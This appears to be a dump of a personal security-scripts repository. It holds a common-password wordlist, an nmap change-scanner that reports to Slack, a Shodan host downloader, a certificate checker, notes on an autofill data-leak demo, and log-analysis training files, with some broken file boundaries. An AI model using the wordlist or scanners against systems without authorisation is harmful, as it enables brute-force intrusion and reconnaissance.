| angel1 185 | ricardo 186 | babygurl 187 | heaven 188 | 55555 189 | baseball 190 | martin 191 | greenday 192 | november 193 | alyssa 194 | madison 195 | mother 196 | 123321 197 | 123abc 198 | mahalkita 199 | batman 200 | september 201 | december 202 | morgan 203 | mariposa 204 | maria 205 | gabriela 206 | iloveyou2 207 | bailey 208 | jeremy 209 | pamela 210 | kimberly 211 | gemini 212 | shannon 213 | pictures 214 | asshole 215 | sophie 216 | jessie 217 | hellokitty 218 | claudia 219 | babygirl1 220 | angelica 221 | austin 222 | mahalko 223 | victor 224 | horses 225 | tiffany 226 | mariana 227 | eduardo 228 | andres 229 | courtney 230 | booboo 231 | kissme 232 | harley 233 | ronaldo 234 | iloveyou1 235 | precious 236 | october 237 | inuyasha 238 | peaches 239 | veronica 240 | chris 241 | 888888 242 | adriana 243 | cutie 244 | james 245 | banana 246 | prince 247 | friend 248 | jesus1 249 | crystal 250 | celtic 251 | -------------------------------------------------------------------------------- /nmapslackscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -u 2 | # 3 | # Tools: NMAP, NDIFF, PRIPS and Slackcli 4 | # SLACKTOKEN from here https://api.slack.com/web 5 | # PRIPS : Parellel processing 6 | # NDIFF latest version 7 | 8 | 9 | NETWORKS="192.168.0.0/24" 10 | TARGETS=$(for NETWORK in ${NETWORKS}; do prips $NETWORK; done) 11 | INTERVAL="1800" 12 | SLACKTOKEN="Get This From https://api.slack.com/web" 13 | OPTIONS='-T4 --open --exclude-ports 25' 14 | 15 | 16 | cd ~/scan 17 | LAST_RUN_FILE='.lastrun' 18 | 19 | while true; do 20 | 21 | # If the last run file exists, we should only sleep for the time 22 | # specified minus the time that's already elapsed. 
23 | if [ -e "${LAST_RUN_FILE}" ]; then 24 | LAST_RUN_TS=$(date -r ${LAST_RUN_FILE} +%s) 25 | NOW_TS=$(date +%s) 26 | LAST_RUN_SECS=$(expr ${NOW_TS} - ${LAST_RUN_TS}) 27 | SLEEP=$(expr ${INTERVAL} - ${LAST_RUN_SECS}) 28 | if [ ${SLEEP} -gt 0 ]; then 29 | UNTIL_SECS=$(expr ${NOW_TS} + ${SLEEP}) 30 | echo $(date) "- sleeping until" $(date --date="@${UNTIL_SECS}") "(${SLEEP}) seconds" 31 | sleep ${SLEEP} 32 | fi 33 | fi 34 | 35 | START_TIME=$(date +%s) 36 | echo '' 37 | echo '==================' 38 | echo '' 39 | 40 | 41 | DATE=`date +%Y-%m-%d_%H-%M-%S` 42 | for TARGET in ${TARGETS}; do 43 | CUR_LOG=scan-${TARGET/\//-}-${DATE} 44 | PREV_LOG=scan-${TARGET/\//-}-prev 45 | DIFF_LOG=scan-${TARGET/\//-}-diff 46 | 47 | echo '' 48 | echo $(date) "- starting ${TARGET}" 49 | 50 | 51 | # Scan the target 52 | nmap ${OPTIONS} ${TARGET} -oX ${CUR_LOG} >/dev/null 53 | 54 | # If there's a previous log, diff it 55 | if [ -e ${PREV_LOG} ]; then 56 | 57 | # Exclude the Nmap version and current date - the date always changes 58 | ndiff ${PREV_LOG} ${CUR_LOG} | egrep -v '^(\+|-)N' > ${DIFF_LOG} 59 | if [ -s ${DIFF_LOG} ]; then 60 | printf "Changes Detected, Sending to Slack." 61 | nmap -sV ${TARGET} | grep open | grep -v "#" > openports.txt 62 | slackcli -t $SLACKTOKEN -h nmap -m "Changes were detected on ${TARGET}. The following ports are now open: " 63 | sleep 1 64 | cat openports.txt | slackcli -t $SLACKTOKEN -h nmap -c 65 | rm openports.txt 66 | # Set the current nmap log file to reflect the last date changed 67 | ln -sf ${CUR_LOG} ${PREV_LOG} 68 | else 69 | # No changes so remove our current log 70 | printf "No Changes Detected." 
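71 | rm ${CUR_LOG} 72 | fi 73 | rm ${DIFF_LOG} 74 | else 75 | # Create the previous scan log 76 | ln -sf ${CUR_LOG} ${PREV_LOG} 77 | fi 78 | done 79 | 80 | touch ${LAST_RUN_FILE} 81 | END_TIME=$(date +%s) 82 | echo 83 | echo $(date) "- finished all targets in" $(expr ${END_TIME} - ${START_TIME}) "second(s)" 84 | done -------------------------------------------------------------------------------- /salaries-flask-app/app.py: --------------------------------------------------------------------------------
from flask import Flask, request
from flask_restful import Resource, Api
from sqlalchemy import create_engine, text
from json import dumps

# One engine for the whole app; each request checks out its own connection.
e = create_engine('sqlite:///salaries.db')
app = Flask(__name__)
api = Api(app)

# NOTE(review): no authentication or authorization is visible in this file,
# so both endpoints answer any caller; confirm that is intended for salary
# data.


class Dept_Meta(Resource):
    """List the distinct department names stored in the salaries table."""

    def get(self):
        # The context manager closes the connection when the request is
        # done; the original never closed it.
        with e.connect() as conn:
            query = conn.execute(text("select distinct DEPARTMENT from salaries"))
            return {'departments': [i[0] for i in query.cursor.fetchall()]}


class Dept_Salary(Resource):
    """Return every salaries row whose Department matches the requested name."""

    def get(self, department_name):
        # department_name comes from the request, so it is passed as a bound
        # parameter. The original formatted it into the statement with '%s',
        # which allowed SQL injection.
        stmt = text("select * from salaries where Department = :dept")
        with e.connect() as conn:
            query = conn.execute(stmt, {'dept': department_name.upper()})
            result = {'data': [dict(zip(tuple(query.keys()), i)) for i in query.cursor]}
        return result


# NOTE(review): Dept_Salary.get() requires department_name, so this route
# presumably carried a URL parameter that the page rendering dropped; confirm
# against the repository before running.
api.add_resource(Dept_Salary,'/dept/')
api.add_resource(Dept_Meta,'/departments')

if __name__ == '__main__':
    app.run()
-------------------------------------------------------------------------------- /salaries-flask-app/salaries.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/salaries-flask-app/salaries.db -------------------------------------------------------------------------------- /shodan_ip_download.py: -------------------------------------------------------------------------------- 1 | from shodan import Shodan 2 | from shodan.helpers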
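"""Download the Shodan host banners for every IP listed in a text file.

Usage: script <ip-list.txt> <output.json.gz>

The Shodan CLI must already be initialised, because the API key is read
from its configuration by ``get_api_key()``.
"""
from sys import argv, exit, stderr

from shodan import APIError, Shodan
from shodan.cli.helpers import get_api_key
from shodan.helpers import open_file, write_banner

# Validation
if len(argv) != 3:
    print('Usage: {} <ip-list.txt> <output.json.gz>'.format(argv[0]))
    print('Example: {} grizzly-ips.txt shodan-grizzly.json.gz'.format(argv[0]))
    exit(1)

input_filename = argv[1]
output_filename = argv[2]

# Must have initialized the CLI before running this script
key = get_api_key()

api = Shodan(key)

# Output file
fout = open_file(output_filename, 'w')
try:
    # Open the file containing the list of IPs
    with open(input_filename, 'r') as fin:
        for line in fin:
            ip = line.strip()
            if not ip:
                # Blank lines would otherwise cost an API call each.
                continue

            print('Processing: {}'.format(ip))
            try:
                info = api.host(ip)
            except APIError as err:
                # Hosts Shodan has no data for are skipped, but the reason is
                # reported. The original bare ``except: pass`` also hid
                # invalid keys, rate limiting and Ctrl-C, which made an empty
                # output file indistinguishable from "nothing found".
                stderr.write('Skipping {}: {}\n'.format(ip, err))
                continue

            # All the banners are stored in the "data" property
            for banner in info.get('data', []):
                write_banner(fout, banner)
finally:
    # Close explicitly so the compressed output is flushed completely.
    fout.close()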
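#!/usr/bin/env python
"""Report certificate subject, subjectAltName, validity dates and issuer
for each host given on the command line (port 443).

What a green result means: the name or the date matches. The TLS context
below has no verify mode or CA store configured, so the certificate chain is
NOT validated -- a self-signed or otherwise untrusted certificate with the
right name and dates is still shown in green.
"""

import sys

if len(sys.argv) < 2:
    print("Usage: %s hostname1 [hostname2] [hostname3] ..." % sys.argv[0])
    print("")
    print("Preparation:")
    print("  $ virtualenv venv")
    print("  $ . venv/bin/activate")
    print("  $ pip install pytz pyasn1 pyOpenSSL ndg-httpsclient")
    # Stop here: without hosts there is nothing to do, and the third-party
    # imports below may fail before the preparation steps have been run.
    sys.exit(1)

import ssl
from datetime import datetime
import pytz
import OpenSSL
import socket


from ndg.httpsclient.subj_alt_name import SubjectAltName
from pyasn1.codec.der import decoder as der_decoder
import pyasn1

# Seconds to wait for the TCP connection before reporting the host as failed.
CONNECT_TIMEOUT = 10


def get_subj_alt_name(peer_cert):
    """Return the subjectAltName entries of ``peer_cert`` as a list of str.

    ``peer_cert`` is a pyOpenSSL X509 object. Every extension whose short
    name is "subjectAltName" is DER-decoded and each component it contains
    is appended to the result. An empty list means no such extension exists.
    pyasn1 decoding errors propagate to the caller.
    """
    dns_name = []
    general_names = SubjectAltName()
    for index in range(peer_cert.get_extension_count()):
        ext = peer_cert.get_extension(index)
        if ext.get_short_name() != "subjectAltName":
            continue
        decoded_dat = der_decoder.decode(ext.get_data(), asn1Spec=general_names)
        for name in decoded_dat:
            if not isinstance(name, SubjectAltName):
                continue
            for entry in range(len(name)):
                component = name.getComponentByPosition(entry)
                dns_name.append(str(component.getComponent()))
    return dns_name


# ANSI colours keyed by check result (True = ok, False = failed).
color = {
    False: "\033[31;1m",
    True: "\033[32;1m",
    'end': "\033[0m",
    'error': "\033[33;1m",
}

for server in sys.argv[1:]:
    # Use a pyOpenSSL method constant: the ssl.PROTOCOL_* values belong to the
    # standard-library ssl module and are not OpenSSL.SSL method constants.
    # SSLv23_METHOD lets both sides negotiate the highest version they share.
    ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    x509 = None
    try:
        s.settimeout(CONNECT_TIMEOUT)
        s.connect((server, 443))
        # Back to blocking mode: pyOpenSSL's handshake expects a blocking
        # socket unless the caller handles WantRead/WantWrite itself.
        s.settimeout(None)
        cnx = OpenSSL.SSL.Connection(ctx, s)
        cnx.set_tlsext_host_name(server)
        cnx.set_connect_state()
        cnx.do_handshake()

        x509 = cnx.get_peer_certificate()
    except Exception as e:
        print("%30s: %s%s%s" % (server, color['error'], e, color['end']))
        continue
    finally:
        # Close on the error path too; the original leaked the socket whenever
        # the connection or the handshake failed.
        s.close()

    issuer_corp = x509.get_issuer().organizationName

    server_name = x509.get_subject().commonName
    server_name_ok = server_name == server

    try:
        subjectAltNames = get_subj_alt_name(x509)
    except pyasn1.error.PyAsn1Error:
        subjectAltNames = []
    server_name_alt_ok = server in subjectAltNames
    if server_name_alt_ok:
        server_name_alt = server
    elif len(subjectAltNames) == 0:
        server_name_alt = None
    else:
        server_name_alt = subjectAltNames[0]

    if len(subjectAltNames) > 1:
        server_name_alt += " (+%i)" % (len(subjectAltNames) - 1)

    now = datetime.now(pytz.utc)
    begin = datetime.strptime(x509.get_notBefore(), "%Y%m%d%H%M%SZ").replace(tzinfo=pytz.UTC)
    begin_ok = begin < now
    end = datetime.strptime(x509.get_notAfter(), "%Y%m%d%H%M%SZ").replace(tzinfo=pytz.UTC)
    end_ok = end > now

    print("%30s: %s%30s%s (alt: %s%30s%s) begin=%s%s%s end=%s%s%s issuer=%s" % (
        server,
        color[server_name_ok], server_name, color['end'],
        color[server_name_alt_ok], server_name_alt, color['end'],
        color[begin_ok], begin.strftime("%d.%m.%Y"), color['end'],
        color[end_ok], end.strftime("%d.%m.%Y"), color['end'],
        issuer_corp))
    print(subjectAltNames)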
6 | 7 | ## Google Chrome behaviour 8 | 9 | Here's the demo in action on the Google Chrome Browser: 10 | 11 | ![Autofill Demo](autofill-demo.gif) 12 | 13 | ## Other browsers 14 | 15 | It works differently in some other browsers. For example: 16 | 17 | * In Safari, it will tell you all the data it is filling into the form, even 18 | if it isn't visible to you. 19 | 20 | * In Firefox, you have to right click an input field and then select an 21 | identity to use. So a Firefox user autofills each field. 22 | 23 | -------------------------------------------------------------------------------- /trainings/Hellman.txt: -------------------------------------------------------------------------------- 1 | Santhosh 2 | Baswa 3 | hellboy 4 | ctfs 5 | conferences 6 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Apache_Log_Analyzer.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Log Analysis/Apache_Log_Analyzer.zip -------------------------------------------------------------------------------- /trainings/Log Analysis/Apache_Log_Analyzer/Apache_Final.py: -------------------------------------------------------------------------------- 1 | #Author: P3t3rp4rk3r 2 | #Team: r3b00t 3 | import re 4 | import os 5 | from geoip import geolite2 6 | os.system("figlet -t Apache Log Analyzer") 7 | print '\033[1m' + '\n\t\t\t\t\t\t\t\t\t\t\t\t -P3t3rp4rk3r' + '\033[0m' 8 | def parse_logs(): 9 | try: 10 | access_file=raw_input("Enter filename:") # Enter File Location 11 | f = open(access_file,'r') # Read the file 12 | print("[+] Accessing file ...!!!"+access_file) 13 | except IOError: 14 | print 'Log file does not exist' 15 | return 16 | log_regx = re.compile(r'(.*?) 
- - \[(.*?)\] "GET (.*?)HTTP\/1.\d" (\d+)') #Regular expression to parse logfile 17 | logs = f.readlines() 18 | logs_parsed = [] 19 | logs_parsed.append(['URL', 'Request', 'Country', 'Location (lat/long)']) #Append to list 20 | for l in logs: 21 | m = re.match(log_regx, str(l)) 22 | if m: 23 | print("[+] Extracting Information (200 OK) Requests...!!!") # Extracting 200 OK requests 24 | if m.group(4) == '200': 25 | row = [] 26 | try: 27 | ipmatch = geolite2.lookup(m.group(1)) 28 | except: 29 | ipmatch = None 30 | if ipmatch is not None: 31 | row.append(m.group(1)) 32 | row.append(m.group(3)) 33 | row.append(ipmatch.country) 34 | row.append(ipmatch.location) 35 | else: 36 | row.append(m.group(1)) 37 | row.append(m.group(3)) 38 | row.append('N/A') 39 | row.append('N/A') 40 | logs_parsed.append(row) 41 | #Non 200 requests are avoided 42 | #else: print l 43 | print_report(logs_parsed) 44 | def print_report(loglist): 45 | print("[+] Generate log_report.html ") # Genrate HTML Report 46 | f = open('log_report.html', 'w') 47 | f.write(""" 48 | 49 | 50 | Apache Log Report 51 | 52 | 53 | """) 54 | f.close() 55 | f = open('log_report.html', 'a') 56 | for l in loglist: 57 | if l[0] == 'URL': 58 | str1 = ''' 59 | 60 | 61 | 62 | 63 | ''' % (l[0], l[1], l[2], l[3]) 64 | f.write(str1) 65 | else: 66 | str1 = ''' 67 | 68 | 69 | 70 | 71 | ''' % (l[0], l[1], l[2], l[3]) 72 | f.write(str1) 73 | os.system("firefox log_report.html") # Open HTML Report in Google Chrome 74 | f.close() 75 | if __name__ == '__main__': 76 | # print "Processing Apache Log File\n\n" 77 | parse_logs() 78 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Bose/Linux for Infosec People.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Log Analysis/Bose/Linux for Infosec People.txt 
-------------------------------------------------------------------------------- /trainings/Log Analysis/Bose/log_analysis_Intro.txt: -------------------------------------------------------------------------------- 1 | Log file: 2 | 3 | It contains a record of the events that indicates how the system processes were loaded. 4 | 5 | System Logs: 6 | system errors, warnings,startup messages, system changes, abnormal shutdowns 7 | 8 | Firewall Logs: 9 | Detect Unsuccessful logins 10 | suspecious outbound connections 11 | Packet analysis (Spoofing attacks) 12 | 13 | Routers & Network Device logs: 14 | logging events 15 | security alerts 16 | 17 | Example Log: IIS Server 18 | #Software: Microsoft Internet Information Services 6.0 19 | #Version: 1.0 20 | #Date: 2009-06-11 05:12:03 21 | #Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 22 | 23 | 2009-06-11 05:12:02 W3SVC1893743816 192.168.1.109 GET / – 4677 – 192.168.1.109 Mozilla/4.0 (compatible;+MSIE+4.01;+Windows+NT;+MS+Search+5.0+Robot) 401 2 2148074254 24 | 25 | 26 | 141.156.21.1-255 27 | 28 | 29 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Bose/log_analysis_Intro1.txt: -------------------------------------------------------------------------------- 1 | cat – prints the content of a file in the terminal window 2 | 3 | cat /var/log/auth.log #Display File 4 | cat >test2 #Create File 5 | cat filename | more 6 | 7 | 8 | grep – searches and filters based on patterns 9 | 10 | dpkg –l | grep python #Search python string in dpkg packages 11 | ifconfig | grep –A 4 eth0 12 | ifconfig | grep -B 4 UP 13 | 14 | 15 | awk – can sort each row into fields and display only what is needed 16 | 17 | awk '{print;}' awk.txt 18 | awk '{print $2,$5;}' awk.txt 19 | awk '$1 >200' awk.txt 20 | awk '$4 ~/Technology/' awk.txt 21 | 22 | sed – performs find and replace functions 23 | sort – 
arranges outpu-t in an order 24 | uniq – compares adjacent lines and can report, filter or provide a count of duplicates 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Trainings_LogAnalysis_Linuxforinfosec.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Log Analysis/Trainings_LogAnalysis_Linuxforinfosec.tar -------------------------------------------------------------------------------- /trainings/Log Analysis/access_log_scan_report_from_Thu_04_Aug_2016_22_01_43: -------------------------------------------------------------------------------- 1 | 2 | Simple Log File Analyzer 3 | 4 | Scan report for access_log on Thu the 04 Aug 2016, 22:01:43 5 | Hint: XSS attempt discovery feature might be a little bit buggy. 6 | 7 | 8 | Number of possible SQL injection attempts found: 0 9 | Number of possible local file inclusion attempts found: 0 10 | Number of possible remote file inclusion attempts found: 6 11 | Number of possible cross-site scripting attempts found: 4 12 | 13 | 14 | Details for the remote file inclusion attempts (line, log entry) 15 | ------------------------------------------------ 16 | {6402: '103.22.201.135 - - [06/May/2013:09:21:13 -0400] "GET / HTTP/1.1" 200 23503 "http://www.google.co.in/url?sa=f&rct=j&url=http://strategicsec.com/&q=http://strategicsec.com/&ei=R66HUaGXPM_trQft0oHgBw&usg=AFQjCNF3EtKMC4yI-N0yyOKhDtZp6QzFWw" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31 AlexaToolbar/alxg-3.1"\n', 163: '199.27.128.189 - - [05/May/2013:05:35:58 -0400] "GET /wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/ HTTP/1.1" 401 483 
"http://strategicsec.com/wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/" "Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.289 Version/12.01"\n', 1353: '173.245.50.210 - - [05/May/2013:12:56:18 -0400] "GET /services/training-services/classroom/hacking-in-paradise/ HTTP/1.1" 200 49353 "http://www.google.com/url?source=web&url=http://strategicsec.com/services/training-services/classroom/hacking-in-paradise/" "Prismatic/1.0.4 CFNetwork/609.1.4 Darwin/13.0.0"\n', 1354: '173.245.50.210 - - [05/May/2013:12:56:21 -0400] "GET /services/training-services/classroom/hacking-in-paradise/ HTTP/1.1" 200 49352 "http://www.google.com/url?source=web&url=http://strategicsec.com/services/training-services/classroom/hacking-in-paradise/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B142"\n', 4077: '103.22.201.245 - - [06/May/2013:02:33:35 -0400] "GET / HTTP/1.1" 200 23051 "http://www.google.co.in/url?sa=f&rct=j&url=http://strategicsec.com/&q=strategicsec.com&ei=vU6HUfSdLMiIrAeKwYDwDw&usg=AFQjCNGwDKoOaUJY5OhFkk1Wx8oooVNtIw" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31"\n', 1118: '199.27.128.189 - - [05/May/2013:11:44:32 -0400] "GET /wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/ HTTP/1.1" 401 483 "http://strategicsec.com/wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:11.0) Gecko/20100101 Firefox/11.0"\n'} 17 | 18 | 19 | Details for the cross-site scripting attempts (line, log entry) 20 | ------------------------------------------------ 21 | {4856: '103.22.200.229 - - [06/May/2013:06:38:52 -0400] "GET /tag/dealing-with-javascript-obfuscation/ HTTP/1.1" 200 24864 "-" "Mozilla/5.0 (iPhone; 
U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"\n', 6620: '103.22.201.135 - - [06/May/2013:09:35:28 -0400] "GET /wp-content/plugins/1-click-retweetsharelike//alert.png HTTP/1.1" 200 481 "http://strategicsec.com/wp-admin/admin.php?page=cforms/cforms-options.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31 AlexaToolbar/alxg-3.1"\n', 4804: '103.22.201.135 - - [06/May/2013:06:35:52 -0400] "GET /wp-content/plugins/1-click-retweetsharelike//alert.png HTTP/1.1" 200 481 "http://strategicsec.com/wp-admin/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31 AlexaToolbar/alxg-3.1"\n', 8257: '173.245.62.99 - - [06/May/2013:11:09:36 -0400] "GET /tag/dealing-with-javascript-obfuscation/ HTTP/1.1" 200 27090 "-" "Mozilla/4.0 (compatible; MSIE; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)"\n'} 22 | 23 | 24 | -------------------------------------------------------------------------------- /trainings/Log Analysis/awk.txt: -------------------------------------------------------------------------------- 1 | 100 Thomas Manager Sales $5,000 2 | 200 Jason Developer Technology $5,500 3 | 300 Sanjay Sysadmin Technology $7,000 4 | 400 Nisha Manager Marketing $9,500 5 | 500 Randy DBA Technology $6,000 6 | -------------------------------------------------------------------------------- /trainings/Log Analysis/cisco.log: -------------------------------------------------------------------------------- 1 | *Sep 4 10:07:40.135: EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface IPv6-mpls, changed state to up 2 | *Sep 4 10:07:41.135: EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up 3 | *Sep 4 10:07:41.135: EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface 
FastEthernet0/1, changed state to up 4 | *Sep 4 05:07:42.519 EST: %SSH-5-DISABLED: SSH 1.99 has been disabled 5 | *Sep 4 05:07:43.575 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback1, changed state to up 6 | *Sep 4 05:07:43.607 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback10, changed state to up 7 | *Sep 4 05:07:43.651 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Tunnel0, changed state to down 8 | *Sep 4 05:07:43.807 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface NVI0, changed state to up 9 | *Sep 4 05:07:44.679 EST: %LINK-5-CHANGED: Interface Tunnel0, changed state to administratively down 10 | *Sep 4 05:07:56.627 EST: %SYS-5-CONFIG_I: Configured from memory by console 11 | *Sep 4 05:07:57.203 EST: %SYS-5-RESTART: System restarted -- 12 | Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(15)T12, RELEASE SOFTWARE (fc3) 13 | Technical Support: http://www.cisco.com/techsupport 14 | Copyright (c) 1986-2010 by Cisco Systems, Inc. 15 | Compiled Fri 22-Jan-10 00:35 by prod_rel_team 16 | *Sep 4 05:07:57.203 EST: %SNMP-5-COLDSTART: SNMP agent on host R1 is undergoing a cold start 17 | *Sep 4 05:07:57.259 EST: %SSH-5-ENABLED: SSH 1.99 has been enabled 18 | *Sep 4 05:07:57.535 EST: %LINK-3-UPDOWN: Interface Virtual-Access1, changed state to up 19 | *Sep 4 05:07:58.903 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Virtual-Access1, changed state to up 20 | Sep 6 11:57:00.021 EST: %DHCPD-4-PING_CONFLICT: DHCP address conflict: server pinged 192.168.1.42. 21 | Sep 14 11:44:51.710 EST: %DHCPD-4-PING_CONFLICT: DHCP address conflict: server pinged 192.168.1.249. 
22 | Sep 20 18:06:27.586 EST: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.168.1.50) 23 | Sep 20 18:07:37.735 EST: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.168.1.50) 24 | -------------------------------------------------------------------------------- /trainings/Log Analysis/cisco_loganalysis.txt: -------------------------------------------------------------------------------- 1 | we will print $5. Only the last 4 lines are being shown for brevity. 2 | 3 | cat cisco.log | awk '{print $5}' | tail -n 4 4 | 5 | Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order. 6 | 7 | cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn 8 | 9 | 10 | -------------------------------------------------------------------------------- /trainings/Log Analysis/log_analysis_Intro.txt: -------------------------------------------------------------------------------- 1 | Log file: 2 | 3 | It contains a record of the events that indicates how the system processes were loaded. 
4 | 5 | System Logs: 6 | system errors, warnings,startup messages, system changes, abnormal shutdowns 7 | 8 | Firewall Logs: 9 | Detect Unsuccessful logins 10 | suspecious outbound connections 11 | Packet analysis (Spoofing attacks) 12 | 13 | Routers & Network Device logs: 14 | logging events 15 | security alerts 16 | 17 | Example Log: IIS Server 18 | #Software: Microsoft Internet Information Services 6.0 19 | #Version: 1.0 20 | #Date: 2009-06-11 05:12:03 21 | #Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 22 | 23 | 2009-06-11 05:12:02 W3SVC1893743816 192.168.1.109 GET / – 4677 – 192.168.1.109 Mozilla/4.0 (compatible;+MSIE+4.01;+Windows+NT;+MS+Search+5.0+Robot) 401 2 2148074254 24 | 25 | 26 | 141.156.21.1-255 27 | 28 | 29 | -------------------------------------------------------------------------------- /trainings/Log Analysis/log_analysis_Intro1.txt: -------------------------------------------------------------------------------- 1 | cat – prints the content of a file in the terminal window 2 | 3 | cat /var/log/auth.log #Display File 4 | cat >test2 #Create File 5 | cat filename | more 6 | 7 | 8 | grep – searches and filters based on patterns 9 | 10 | dpkg –l | grep python #Search python string in dpkg packages 11 | ifconfig | grep –A 4 eth0 12 | ifconfig | grep -B 4 UP 13 | 14 | 15 | awk – can sort each row into fields and display only what is needed 16 | 17 | awk '{print;}' awk.txt 18 | awk '{print $2,$5;}' awk.txt 19 | awk '$1 >200' awk.txt 20 | awk '$4 ~/Technology/' awk.txt 21 | 22 | sed – performs find and replace functions 23 | sort – arranges outpu-t in an order 24 | uniq – compares adjacent lines and can report, filter or provide a count of duplicates 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /trainings/Log Analysis/soc.txt: 
-------------------------------------------------------------------------------- 1 | santhosh 2 | soc engineer 3 | netenrich 4 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/file-enc-pubkey.txt: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PUBLIC KEY BLOCK----- 2 | Version: GnuPG v1 3 | 4 | mQENBFd2py8BCACp85eS6bF9ap7xbBBpF3rJ40ApbcadQh91PUGGqVwrkp6/R7cZ 5 | HpSVCPtkykC+I1KBzSvxOP+3ohxDG/eyoQxtlmF6bDcAHWxa4DiHuW3yPlTa+siM 6 | pgBPdUm4Bg6UcHijueDV2i5TECPfND4eGKfWYIa++/fuhzIwBmMG1X+FGViw2sc9 7 | WEKxYkcvmbCYZt+nliGisipWf3fXf5yXWBoIdO4bOZTOoGPoH3iwJBDdEjmfm5PF 8 | XIVX9IHXnb8TOzaLZkP4nUy6EA811KAkWdOzEywPMpfeq30qkAhqqXfamjsTqUAj 9 | wiV8Q5Rtbl5qiOo8Va3cpZtDfv/llCBlnXUnABEBAAG0RlNhbnRob3NoIEJhc3dh 10 | IChBc3ltZXRyaWMgQ3J5cHRvZ3JhcGh5KSA8c2FudGhvc2guYmFzd2FAbmV0ZW5y 11 | aWNoLmNvbT6JATgEEwECACIFAld2py8CGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4B 12 | AheAAAoJEBeSOKHHO1Zn4LMH/RgTTX6up2/46dsgLwc1ILAda5xdDVS1RSoG6oY1 13 | ANxYNzoWSB36VUMiV4iYWQEEvBH0ebk4gu/igVDaoVV1DM+u2jd5aCCvzcm5jrzK 14 | tV0iChNGcEx+ChEWoITWfHnDtB5iRY5MpJvkMplIjj296mjI9CNawvecl7w50Dh4 15 | nOjwYuuuGwptuWuvjCxoZ4F1wOtL/vt/ZYcUvtv8X9R3VBDrl21YhXoLJb43ZqB5 16 | Ffol5nIVPvaPBLXh8gB/FlDP6j6/Py/rnQSOLwUNwTk7GdvozhEcfItcZLltp/VE 17 | 0qvFCpBFjsYHSQ79DwCMcZbo183RrIvmuCzcXL1+q3FGoAS5AQ0EV3anLwEIAM7s 18 | NY1f/SGgZEkxI7Ov55ft581wmUQUI555wU5f0+NW85dW9ooS8ckbVczhOQtwq716 19 | plKJNsZ0akbZ6mE2EA05QsEzDeArSdcBZ8rjRL6ddrJ/qZ8RF1w/g035lKu1NgNI 20 | lrD2n20Nt0Fabi0fMvpVCMaSxBON83kbgC3IDIY5/+FiEnihi+IYJ/fdQjDrSbS2 21 | si2aimsIXbPuKo7hj7Wg3CCNmaF9h2X9Y2y2wPaytBuUVMKY61MyBg869KdNzvqp 22 | 